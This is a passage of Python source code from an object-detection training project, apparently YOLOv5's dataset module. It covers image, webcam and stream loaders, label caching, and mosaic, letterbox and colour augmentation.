        super().__init__(*args, **kwargs)
        # DataLoader forbids rebinding attributes after __init__, so bypass
        # its __setattr__ to wrap the batch sampler in a never-ending one;
        # worker processes then persist across epochs instead of respawning.
        object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
        self.iterator = super().__iter__()

    def __len__(self):
        # Length of one epoch, not of the infinite stream.
        return len(self.batch_sampler.sampler)

    def __iter__(self):
        # Pull exactly one epoch's worth of batches from the persistent iterator.
        for i in range(len(self)):
            yield next(self.iterator)
class _RepeatSampler(object):
    """Wrap a sampler so it yields its indices forever.

    Args:
        sampler (Sampler): the sampler to repeat indefinitely.
    """

    def __init__(self, sampler):
        self.sampler = sampler

    def __iter__(self):
        # Restart the wrapped sampler every time it is exhausted.
        while True:
            for index in self.sampler:
                yield index
class LoadImages:  # for inference
    """Iterate images and/or videos from a file, directory, or glob pattern.

    Each iteration yields (path, letterboxed CHW RGB array, original BGR
    image, cv2.VideoCapture or None).
    """

    def __init__(self, path, img_size=640, stride=32):
        p = str(Path(path).absolute())  # os-agnostic absolute path
        if '*' in p:
            files = sorted(glob.glob(p, recursive=True))  # glob
        elif os.path.isdir(p):
            files = sorted(glob.glob(os.path.join(p, '*.*')))  # dir
        elif os.path.isfile(p):
            files = [p]  # files
        else:
            raise Exception(f'ERROR: {p} does not exist')

        # Partition by extension; images are iterated before videos.
        images = [x for x in files if x.split('.')[-1].lower() in img_formats]
        videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
        ni, nv = len(images), len(videos)

        self.img_size = img_size
        self.stride = stride
        self.files = images + videos
        self.nf = ni + nv  # number of files
        self.video_flag = [False] * ni + [True] * nv
        self.mode = 'image'
        if any(videos):
            self.new_video(videos[0])  # new video
        else:
            self.cap = None
        assert self.nf > 0, f'No images or videos found in {p}. ' \
                            f'Supported formats are:\nimages: {img_formats}\nvideos: {vid_formats}'

    def __iter__(self):
        self.count = 0
        return self

    def __next__(self):
        if self.count == self.nf:
            raise StopIteration
        path = self.files[self.count]

        if self.video_flag[self.count]:
            # Read video frame; roll over to the next file when exhausted.
            self.mode = 'video'
            ret_val, img0 = self.cap.read()
            if not ret_val:
                self.count += 1
                self.cap.release()
                if self.count == self.nf:  # last video
                    raise StopIteration
                else:
                    path = self.files[self.count]
                    self.new_video(path)
                    ret_val, img0 = self.cap.read()

            self.frame += 1
            print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.nframes}) {path}: ', end='')

        else:
            # Read image
            self.count += 1
            img0 = cv2.imread(path)  # BGR
            assert img0 is not None, 'Image Not Found ' + path
            #print(f'image {self.count}/{self.nf} {path}: ', end='')

        # Padded resize
        img = letterbox(img0, self.img_size, stride=self.stride)[0]

        # Convert
        img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB, to 3x416x416
        img = np.ascontiguousarray(img)

        return path, img, img0, self.cap

    def new_video(self, path):
        # Open a new capture and reset the per-video frame counter.
        self.frame = 0
        self.cap = cv2.VideoCapture(path)
        self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))

    def __len__(self):
        return self.nf  # number of files
class LoadWebcam:  # for inference
    """Iterate frames from a local webcam or an IP-camera URL.

    Yields ('webcam.jpg', letterboxed CHW RGB array, original BGR frame, None).
    """

    def __init__(self, pipe='0', img_size=640, stride=32):
        self.img_size = img_size
        self.stride = stride

        if pipe.isnumeric():
            # NOTE(review): eval() turns '0' into the int camera index; safe
            # for numeric strings but unsafe if ever fed untrusted input.
            pipe = eval(pipe)  # local camera
        # pipe = 'rtsp://192.168.1.64/1'  # IP camera
        # pipe = 'rtsp://username:password@192.168.1.64/1'  # IP camera with login
        # pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg'  # IP golf camera

        self.pipe = pipe
        self.cap = cv2.VideoCapture(pipe)  # video capture object
        self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3)  # set buffer size

    def __iter__(self):
        self.count = -1
        return self

    def __next__(self):
        self.count += 1
        if cv2.waitKey(1) == ord('q'):  # q to quit
            self.cap.release()
            cv2.destroyAllWindows()
            raise StopIteration

        # Read frame
        if self.pipe == 0:  # local camera
            ret_val, img0 = self.cap.read()
            img0 = cv2.flip(img0, 1)  # flip left-right
        else:  # IP camera
            n = 0
            while True:
                n += 1
                self.cap.grab()
                if n % 30 == 0:  # skip frames
                    ret_val, img0 = self.cap.retrieve()
                    if ret_val:
                        break

        # Print
        assert ret_val, f'Camera Error {self.pipe}'
        img_path = 'webcam.jpg'
        print(f'webcam {self.count}: ', end='')

        # Padded resize
        img = letterbox(img0, self.img_size, stride=self.stride)[0]

        # Convert
        img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB, to 3x416x416
        img = np.ascontiguousarray(img)

        return img_path, img, img0, None

    def __len__(self):
        return 0
class LoadStreams:  # multiple IP or RTSP cameras
    """Read several video streams concurrently, one daemon thread per stream.

    Yields (sources, batched CHW RGB array, list of original BGR frames, None).
    """

    def __init__(self, sources='streams.txt', img_size=640, stride=32):
        self.mode = 'stream'
        self.img_size = img_size
        self.stride = stride

        # `sources` may be a file of URLs (one per line) or a single URL.
        if os.path.isfile(sources):
            with open(sources, 'r') as f:
                sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
        else:
            sources = [sources]

        n = len(sources)
        self.imgs = [None] * n
        self.sources = [clean_str(x) for x in sources]  # clean source names for later
        for i, s in enumerate(sources):
            # Start the thread to read frames from the video stream
            print(f'{i + 1}/{n}: {s}... ', end='')
            # NOTE(review): eval() converts numeric strings to camera indices;
            # unsafe if the sources file is untrusted.
            cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
            assert cap.isOpened(), f'Failed to open {s}'
            w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
            h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
            fps = cap.get(cv2.CAP_PROP_FPS) % 100
            _, self.imgs[i] = cap.read()  # guarantee first frame
            thread = Thread(target=self.update, args=([i, cap]), daemon=True)
            print(f' success ({w}x{h} at {fps:.2f} FPS).')
            thread.start()
        print('')  # newline

        # check for common shapes
        s = np.stack([letterbox(x, self.img_size, stride=self.stride)[0].shape for x in self.imgs], 0)  # shapes
        self.rect = np.unique(s, axis=0).shape[0] == 1  # rect inference if all shapes equal
        if not self.rect:
            print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')

    def update(self, index, cap):
        # Read next stream frame in a daemon thread
        n = 0
        while cap.isOpened():
            n += 1
            # _, self.imgs[index] = cap.read()
            cap.grab()
            if n == 4:  # read every 4th frame
                success, im = cap.retrieve()
                # On failure, zero out the last frame rather than keep stale data.
                self.imgs[index] = im if success else self.imgs[index] * 0
                n = 0
            time.sleep(0.01)  # wait time

    def __iter__(self):
        self.count = -1
        return self

    def __next__(self):
        self.count += 1
        img0 = self.imgs.copy()
        if cv2.waitKey(1) == ord('q'):  # q to quit
            cv2.destroyAllWindows()
            raise StopIteration

        # Letterbox
        img = [letterbox(x, self.img_size, auto=self.rect, stride=self.stride)[0] for x in img0]

        # Stack
        img = np.stack(img, 0)

        # Convert
        img = img[:, :, :, ::-1].transpose(0, 3, 1, 2)  # BGR to RGB, to bsx3x416x416
        img = np.ascontiguousarray(img)

        return self.sources, img, img0, None

    def __len__(self):
        return 0  # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
    """Derive label-file paths from image paths: the first '/images/' path
    component becomes '/labels/' and the image extension becomes '.txt'."""
    img_dir = os.sep + 'images' + os.sep  # /images/ substring
    label_dir = os.sep + 'labels' + os.sep  # /labels/ substring
    label_paths = []
    for img_path in img_paths:
        swapped = img_path.replace(img_dir, label_dir, 1)
        ext = img_path.split('.')[-1]
        # Replace only the trailing extension occurrence.
        label_paths.append('txt'.join(swapped.rsplit(ext, 1)))
    return label_paths
class LoadImagesAndLabels(Dataset):  # for training/testing
    """Dataset of images with YOLO-format labels.

    Builds the image list from dirs/files/list-files, loads (or rebuilds) a
    label cache, supports rectangular batching, mosaic/mixup augmentation,
    and optional in-RAM image caching.

    Fix applied: ``.astype(np.int)`` replaced with ``.astype(int)`` — the
    ``np.int`` alias was deprecated in NumPy 1.20 and removed in 1.24.
    """

    def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
                 cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
        self.img_size = img_size
        self.augment = augment
        self.hyp = hyp
        self.image_weights = image_weights
        self.rect = False if image_weights else rect
        self.mosaic = self.augment and not self.rect  # load 4 images at a time into a mosaic (only during training)
        self.mosaic_border = [-img_size // 2, -img_size // 2]
        self.stride = stride
        self.path = path
        try:
            f = []  # image files
            for p in path if isinstance(path, list) else [path]:
                p = Path(p)  # os-agnostic
                if p.is_dir():  # dir
                    f += glob.glob(str(p / '**' / '*.*'), recursive=True)
                    # f = list(p.rglob('**/*.*'))  # pathlib
                elif p.is_file():  # file
                    with open(p, 'r') as t:
                        t = t.read().strip().splitlines()
                        parent = str(p.parent) + os.sep
                        f += [x.replace('./', parent) if x.startswith('./') else x for x in t]  # local to global path
                        # f += [p.parent / x.lstrip(os.sep) for x in t]  # local to global path (pathlib)
                else:
                    raise Exception(f'{prefix}{p} does not exist')
            self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
            # self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats])  # pathlib
            assert self.img_files, f'{prefix}No images found'
        except Exception as e:
            raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {help_url}')

        # Check cache
        # NOTE(review): `p` below leaks from the loop above (last path entry);
        # works for a single-path dataset — confirm behavior for path lists.
        self.label_files = img2label_paths(self.img_files)  # labels
        cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')  # cached labels
        if cache_path.is_file():
            cache, exists = torch.load(cache_path), True  # load
            if cache['hash'] != get_hash(self.label_files + self.img_files) or 'version' not in cache:  # changed
                cache, exists = self.cache_labels(cache_path, prefix), False  # re-cache
        else:
            cache, exists = self.cache_labels(cache_path, prefix), False  # cache

        # Display cache
        nf, nm, ne, nc, n = cache.pop('results')  # found, missing, empty, corrupted, total
        if exists:
            d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
            tqdm(None, desc=prefix + d, total=n, initial=n)  # display cache results
        assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {help_url}'

        # Read cache
        cache.pop('hash')  # remove hash
        cache.pop('version')  # remove version
        labels, shapes, self.segments = zip(*cache.values())
        self.labels = list(labels)
        self.shapes = np.array(shapes, dtype=np.float64)
        self.img_files = list(cache.keys())  # update
        self.label_files = img2label_paths(cache.keys())  # update
        if single_cls:
            # Collapse every class id to 0 for single-class training.
            for x in self.labels:
                x[:, 0] = 0

        n = len(shapes)  # number of images
        bi = np.floor(np.arange(n) / batch_size).astype(int)  # batch index
        nb = bi[-1] + 1  # number of batches
        self.batch = bi  # batch index of image
        self.n = n
        self.indices = range(n)

        # Rectangular Training
        if self.rect:
            # Sort by aspect ratio
            s = self.shapes  # wh
            ar = s[:, 1] / s[:, 0]  # aspect ratio
            irect = ar.argsort()
            self.img_files = [self.img_files[i] for i in irect]
            self.label_files = [self.label_files[i] for i in irect]
            self.labels = [self.labels[i] for i in irect]
            self.shapes = s[irect]  # wh
            ar = ar[irect]

            # Set training image shapes
            shapes = [[1, 1]] * nb
            for i in range(nb):
                ari = ar[bi == i]
                mini, maxi = ari.min(), ari.max()
                if maxi < 1:
                    shapes[i] = [maxi, 1]
                elif mini > 1:
                    shapes[i] = [1, 1 / mini]

            self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(int) * stride

        # Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
        self.imgs = [None] * n
        if cache_images:
            gb = 0  # Gigabytes of cached images
            self.img_hw0, self.img_hw = [None] * n, [None] * n
            results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n)))  # 8 threads
            pbar = tqdm(enumerate(results), total=n)
            for i, x in pbar:
                self.imgs[i], self.img_hw0[i], self.img_hw[i] = x  # img, hw_original, hw_resized = load_image(self, i)
                gb += self.imgs[i].nbytes
                pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB)'

    def cache_labels(self, path=Path('./labels.cache'), prefix=''):
        """Scan all image/label pairs, verify them, and persist the result
        (per-file labels/shapes/segments plus summary counts) to *path*."""
        x = {}  # dict
        nm, nf, ne, nc = 0, 0, 0, 0  # number missing, found, empty, duplicate
        pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
        for i, (im_file, lb_file) in enumerate(pbar):
            try:
                # verify images
                im = Image.open(im_file)
                im.verify()  # PIL verify
                shape = exif_size(im)  # image size
                segments = []  # instance segments
                assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
                assert im.format.lower() in img_formats, f'invalid image format {im.format}'

                # verify labels
                if os.path.isfile(lb_file):
                    nf += 1  # label found
                    with open(lb_file, 'r') as f:
                        l = [x.split() for x in f.read().strip().splitlines()]
                        if any([len(x) > 8 for x in l]):  # is segment
                            classes = np.array([x[0] for x in l], dtype=np.float32)
                            segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l]  # (cls, xy1...)
                            l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1)  # (cls, xywh)
                        l = np.array(l, dtype=np.float32)
                    if len(l):
                        assert l.shape[1] == 5, 'labels require 5 columns each'
                        assert (l >= 0).all(), 'negative labels'
                        assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
                        assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
                    else:
                        ne += 1  # label empty
                        l = np.zeros((0, 5), dtype=np.float32)
                else:
                    nm += 1  # label missing
                    l = np.zeros((0, 5), dtype=np.float32)
                x[im_file] = [l, shape, segments]
            except Exception as e:
                nc += 1
                print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')

            pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels... " \
                        f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"

        if nf == 0:
            print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')

        x['hash'] = get_hash(self.label_files + self.img_files)
        x['results'] = nf, nm, ne, nc, i + 1
        x['version'] = 0.1  # cache version
        torch.save(x, path)  # save for next time
        logging.info(f'{prefix}New cache created: {path}')
        return x

    def __len__(self):
        return len(self.img_files)

    # def __iter__(self):
    #     self.count = -1
    #     print('ran dataset iter')
    #     #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
    #     return self

    def __getitem__(self, index):
        """Return (image tensor CHW RGB, labels [img_idx, cls, xywh], path, shapes)."""
        index = self.indices[index]  # linear, shuffled, or image_weights

        hyp = self.hyp
        mosaic = self.mosaic and random.random() < hyp['mosaic']
        if mosaic:
            # Load mosaic
            img, labels = load_mosaic(self, index)
            shapes = None

            # MixUp https://arxiv.org/pdf/1710.09412.pdf
            if random.random() < hyp['mixup']:
                img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
                r = np.random.beta(8.0, 8.0)  # mixup ratio, alpha=beta=8.0
                img = (img * r + img2 * (1 - r)).astype(np.uint8)
                labels = np.concatenate((labels, labels2), 0)

        else:
            # Load image
            img, (h0, w0), (h, w) = load_image(self, index)

            # Letterbox
            shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size  # final letterboxed shape
            img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
            shapes = (h0, w0), ((h / h0, w / w0), pad)  # for COCO mAP rescaling

            labels = self.labels[index].copy()
            if labels.size:  # normalized xywh to pixel xyxy format
                labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])

        if self.augment:
            # Augment imagespace
            if not mosaic:
                img, labels = random_perspective(img, labels,
                                                 degrees=hyp['degrees'],
                                                 translate=hyp['translate'],
                                                 scale=hyp['scale'],
                                                 shear=hyp['shear'],
                                                 perspective=hyp['perspective'])

            # Augment colorspace
            augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])

            # Apply cutouts
            # if random.random() < 0.9:
            #     labels = cutout(img, labels)

        nL = len(labels)  # number of labels
        if nL:
            labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])  # convert xyxy to xywh
            labels[:, [2, 4]] /= img.shape[0]  # normalized height 0-1
            labels[:, [1, 3]] /= img.shape[1]  # normalized width 0-1

        if self.augment:
            # flip up-down
            if random.random() < hyp['flipud']:
                img = np.flipud(img)
                if nL:
                    labels[:, 2] = 1 - labels[:, 2]

            # flip left-right
            if random.random() < hyp['fliplr']:
                img = np.fliplr(img)
                if nL:
                    labels[:, 1] = 1 - labels[:, 1]

        # Column 0 is left zero for collate_fn to fill with the image index.
        labels_out = torch.zeros((nL, 6))
        if nL:
            labels_out[:, 1:] = torch.from_numpy(labels)

        # Convert
        img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB, to 3x416x416
        img = np.ascontiguousarray(img)

        return torch.from_numpy(img), labels_out, self.img_files[index], shapes

    @staticmethod
    def collate_fn(batch):
        """Stack images and concatenate labels, tagging each label row with
        its image index within the batch."""
        img, label, path, shapes = zip(*batch)  # transposed
        for i, l in enumerate(label):
            l[:, 0] = i  # add target image index for build_targets()
        return torch.stack(img, 0), torch.cat(label, 0), path, shapes

    @staticmethod
    def collate_fn4(batch):
        """Quad collate: merge each group of 4 samples into one sample, either
        by upscaling one image 2x or by tiling all four into a 2x2 grid."""
        img, label, path, shapes = zip(*batch)  # transposed
        n = len(shapes) // 4
        img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]

        ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
        wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
        s = torch.tensor([[1, 1, .5, .5, .5, .5]])  # scale
        for i in range(n):  # zidane torch.zeros(16,3,720,1280)  # BCHW
            i *= 4
            if random.random() < 0.5:
                im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
                    0].type(img[i].type())
                l = label[i]
            else:
                im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
                l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
            img4.append(im)
            label4.append(l)

        for i, l in enumerate(label4):
            l[:, 0] = i  # add target image index for build_targets()

        return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
    """Load one dataset image; return (BGR array, original hw, resized hw).

    Served straight from ``self.imgs`` when cached, otherwise read from disk
    and resized so the longer side equals ``self.img_size``.
    """
    cached = self.imgs[index]
    if cached is not None:
        return cached, self.img_hw0[index], self.img_hw[index]  # img, hw_original, hw_resized
    path = self.img_files[index]
    img = cv2.imread(path)  # BGR
    assert img is not None, 'Image Not Found ' + path
    h0, w0 = img.shape[:2]  # orig hw
    scale = self.img_size / max(h0, w0)  # resize image to img_size
    if scale != 1:  # always resize down, only resize up if training with augmentation
        interp = cv2.INTER_AREA if scale < 1 and not self.augment else cv2.INTER_LINEAR
        img = cv2.resize(img, (int(w0 * scale), int(h0 * scale)), interpolation=interp)
    return img, (h0, w0), img.shape[:2]  # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
    """Randomly jitter hue/saturation/value of a BGR uint8 image in place."""
    r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1  # random gains
    hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
    dtype = img.dtype  # uint8
    # Build one 256-entry lookup table per channel, then remap each channel
    # with a single C-level LUT pass.
    x = np.arange(0, 256, dtype=np.int16)
    lut_hue = ((x * r[0]) % 180).astype(dtype)  # OpenCV 8-bit hue range is 0-179
    lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
    lut_val = np.clip(x * r[2], 0, 255).astype(dtype)

    img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
    cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img)  # no return needed
def hist_equalize(img, clahe=True, bgr=False):
    # Equalize histogram on BGR image 'img' with img.shape(n,m,3) and range 0-255
    to_yuv = cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV
    from_yuv = cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB
    yuv = cv2.cvtColor(img, to_yuv)
    # Equalize only the luma (Y) channel so colors are preserved.
    if clahe:
        limiter = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
        yuv[:, :, 0] = limiter.apply(yuv[:, :, 0])
    else:
        yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0])  # equalize Y channel histogram
    return cv2.cvtColor(yuv, from_yuv)  # convert YUV image to RGB
def load_mosaic(self, index):
    # loads images in a 4-mosaic
    """Compose 4 images into one 2s x 2s mosaic around a random center and
    return (mosaic image, pixel-space xyxy labels) after random_perspective."""
    labels4, segments4 = [], []
    s = self.img_size
    # Random mosaic center inside the central region defined by mosaic_border.
    yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border]  # mosaic center x, y
    indices = [index] + random.choices(self.indices, k=3)  # 3 additional image indices
    for i, index in enumerate(indices):
        # Load image
        img, _, (h, w) = load_image(self, index)

        # place img in img4: compute the destination window (a-coords, large
        # canvas) and the matching source window (b-coords, small image).
        if i == 0:  # top left
            img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8)  # base image with 4 tiles
            x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc  # xmin, ymin, xmax, ymax (large image)
            x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h  # xmin, ymin, xmax, ymax (small image)
        elif i == 1:  # top right
            x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
            x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
        elif i == 2:  # bottom left
            x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
            x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
        elif i == 3:  # bottom right
            x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
            x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)

        img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b]  # img4[ymin:ymax, xmin:xmax]
        padw = x1a - x1b
        padh = y1a - y1b

        # Labels: shift each tile's labels/segments into mosaic coordinates.
        labels, segments = self.labels[index].copy(), self.segments[index].copy()
        if labels.size:
            labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh)  # normalized xywh to pixel xyxy format
            segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
        labels4.append(labels)
        segments4.extend(segments)

    # Concat/clip labels
    labels4 = np.concatenate(labels4, 0)
    for x in (labels4[:, 1:], *segments4):
        np.clip(x, 0, 2 * s, out=x)  # clip when using random_perspective()
    # img4, labels4 = replicate(img4, labels4)  # replicate

    # Augment
    img4, labels4 = random_perspective(img4, labels4, segments4,
                                       degrees=self.hyp['degrees'],
                                       translate=self.hyp['translate'],
                                       scale=self.hyp['scale'],
                                       shear=self.hyp['shear'],
                                       perspective=self.hyp['perspective'],
                                       border=self.mosaic_border)  # border to remove

    return img4, labels4
def load_mosaic9(self, index):
    """Build a 9-image mosaic: the indexed image plus 8 random ones laid out
    on a 3s x 3s canvas, then cropped to a 2s x 2s window at a random offset.

    Returns (img9, labels9) with labels in pixel-xyxy coordinates relative
    to the cropped canvas, after random_perspective() augmentation.
    """
    # loads images in a 9-mosaic
    labels9, segments9 = [], []
    s = self.img_size
    indices = [index] + random.choices(self.indices, k=8)  # 8 additional image indices
    for i, index in enumerate(indices):
        # Load image
        img, _, (h, w) = load_image(self, index)

        # place img in img9 -- tile coordinates depend on the previous tile's
        # size (hp/wp) and the center tile's size (h0/w0), so branch order matters
        if i == 0:  # center
            img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8)  # base canvas for 9 tiles, grey fill
            h0, w0 = h, w
            c = s, s, s + w, s + h  # xmin, ymin, xmax, ymax (base) coordinates
        elif i == 1:  # top
            c = s, s - h, s + w, s
        elif i == 2:  # top right
            c = s + wp, s - h, s + wp + w, s
        elif i == 3:  # right
            c = s + w0, s, s + w0 + w, s + h
        elif i == 4:  # bottom right
            c = s + w0, s + hp, s + w0 + w, s + hp + h
        elif i == 5:  # bottom
            c = s + w0 - w, s + h0, s + w0, s + h0 + h
        elif i == 6:  # bottom left
            c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
        elif i == 7:  # left
            c = s - w, s + h0 - h, s, s + h0
        elif i == 8:  # top left
            c = s - w, s + h0 - hp - h, s, s + h0 - hp

        padx, pady = c[:2]
        x1, y1, x2, y2 = [max(x, 0) for x in c]  # clamp negative coords to the canvas

        # Labels
        labels, segments = self.labels[index].copy(), self.segments[index].copy()
        if labels.size:
            labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady)  # normalized xywh to pixel xyxy format
            segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
        labels9.append(labels)
        segments9.extend(segments)

        # Image
        img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:]  # img9[ymin:ymax, xmin:xmax]
        hp, wp = h, w  # height, width previous

    # Offset: crop a 2s x 2s window at a random position
    yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border]  # mosaic center x, y
    img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]

    # Concat/clip labels: shift into the cropped window's frame
    labels9 = np.concatenate(labels9, 0)
    labels9[:, [1, 3]] -= xc
    labels9[:, [2, 4]] -= yc
    c = np.array([xc, yc])  # centers
    segments9 = [x - c for x in segments9]

    for x in (labels9[:, 1:], *segments9):
        np.clip(x, 0, 2 * s, out=x)  # clip when using random_perspective()
    # img9, labels9 = replicate(img9, labels9)  # replicate

    # Augment
    img9, labels9 = random_perspective(img9, labels9, segments9,
                                       degrees=self.hyp['degrees'],
                                       translate=self.hyp['translate'],
                                       scale=self.hyp['scale'],
                                       shear=self.hyp['shear'],
                                       perspective=self.hyp['perspective'],
                                       border=self.mosaic_border)  # border to remove
    return img9, labels9
def replicate(img, labels):
    """Duplicate the smallest half of the labelled boxes by pasting a copy of
    each at a random free position inside the image.

    Mutates `img` in place and returns it together with `labels` extended by
    one row per pasted box (same class, new coordinates).
    """
    h, w = img.shape[:2]
    boxes = labels[:, 1:].astype(int)
    x1, y1, x2, y2 = boxes.T
    sides = ((x2 - x1) + (y2 - y1)) / 2  # mean side length per box (pixels)
    # replicate only the smaller half of the boxes
    for idx in sides.argsort()[:round(sides.size * 0.5)]:
        bx1, by1, bx2, by2 = boxes[idx]
        box_h, box_w = by2 - by1, bx2 - bx1
        # random top-left corner such that the pasted copy stays in bounds
        yc, xc = int(random.uniform(0, h - box_h)), int(random.uniform(0, w - box_w))
        nx1, ny1, nx2, ny2 = xc, yc, xc + box_w, yc + box_h
        img[ny1:ny2, nx1:nx2] = img[by1:by2, bx1:bx2]  # paste the patch
        labels = np.append(labels, [[labels[idx, 0], nx1, ny1, nx2, ny2]], axis=0)
    return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32):
    """Resize `img` to fit `new_shape` while keeping aspect ratio, then pad to
    meet stride-multiple constraints.

    Returns (padded_image, (w_ratio, h_ratio), (dw, dh)) where dw/dh are the
    per-side padding actually applied.
    """
    h0, w0 = img.shape[:2]  # current shape (height, width)
    if isinstance(new_shape, int):
        new_shape = (new_shape, new_shape)

    # Scale ratio (new / old); never upscale when scaleup is off
    scale = min(new_shape[0] / h0, new_shape[1] / w0)
    if not scaleup:
        scale = min(scale, 1.0)

    ratio = scale, scale  # width, height ratios
    new_unpad = int(round(w0 * scale)), int(round(h0 * scale))
    dw = new_shape[1] - new_unpad[0]  # width padding
    dh = new_shape[0] - new_unpad[1]  # height padding
    if auto:
        # minimum rectangle: pad only up to the next stride multiple
        dw, dh = np.mod(dw, stride), np.mod(dh, stride)
    elif scaleFill:
        # stretch to fill exactly, no padding
        dw, dh = 0.0, 0.0
        new_unpad = (new_shape[1], new_shape[0])
        ratio = new_shape[1] / w0, new_shape[0] / h0

    dw /= 2  # split padding between the two sides
    dh /= 2

    if (w0, h0) != new_unpad:
        img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
    top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
    left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
    img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color)
    return img, ratio, (dw, dh)
def random_perspective(img, targets=(), segments=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0,
                       border=(0, 0)):
    """Apply a random perspective/affine augmentation to the image and its
    targets (boxes and, optionally, polygon segments).

    Equivalent in spirit to torchvision.transforms.RandomAffine(degrees=(-10, 10),
    translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10)).
    targets = [cls, xyxy]; returns the warped image and the surviving targets.
    """
    # output size after removing the mosaic border
